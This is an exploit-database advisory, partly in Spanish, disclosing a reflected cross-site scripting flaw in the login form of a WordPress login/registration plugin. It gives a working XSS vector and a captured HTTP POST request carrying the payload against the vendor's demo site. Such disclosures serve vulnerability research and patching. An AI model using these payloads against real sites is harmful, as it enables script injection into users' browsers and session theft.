WordPress Simple Login Registration 1.0.1 Cross Site Scripting

2013-08-26T00:00:00
ID PACKETSTORM:122963
Type packetstorm
Reporter Dylan Irzi
Modified 2013-08-26T00:00:00

Description

                                        
                                            `###########################################################################################  
# Exploit Title: Cross Site Scripting WP Simple Login Registration 1.0.1 -  
Wordpress  
# Date: 26 de Agosto del 2013  
# Exploit Author: Dylan Irzi  
# Credit goes for: websecuritydev.com  
# Vendor Homepage:  
http://envato.dropntheme.com/wp-simple-login-registration-plugin/  
# Tested on: Win8 & Linux Mint  
# Affected Version : 1.01 y Posteriores.  
###########################################################################################  
Timeline:  
- 20 De agosto XSS Encontrado y Reportado.  
- 25 De Agosto Vendedor responde que la vulnerabilidad es por PHP.INI  
- 26 De Agosto Diclosure!!  
  
  
------------------------------------------------------------------------------------------  
Campos de Login Son Vulnerables a Cross Site Scripting Reflected Via Post.  
  
<input id="username" class="text-input" type="text" value="Vector XSS"  
name="username">  
<input type="password" class="text-input" id="password" name="password">  
  
Vector: ""><img src=x onerror=prompt(/XSS/);>>  
Example:  
http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/  
  
http Live Request.  
------------------------------------------------------------------------------------------  
Host: envato.dropntheme.com  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:23.0) Gecko/20100101  
Firefox/23.0 AlexaToolbar/alxf-2.18  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Referer:  
http://envato.dropntheme.com/wp-simple-login-registration-plugin/live-demo/login/  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 252  
  
POST:  
username=%22%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%28%2FXSS%2F%29%3B%3E%3E&password=&remember-me=forever&submit=Log+in&login_nonce_field=a72b0d3cb6&_wp_http_referer=%2Fwp-simple-login-registration-plugin%2Flive-demo%2Flogin%2F&wpslrp_action=ddsfeu_login  
  
------------------------------------------------------------------------------------------  
  
*By Dylan Irzi  
@Dylan_Irzi11  
Pentest de Seguridad.*  
`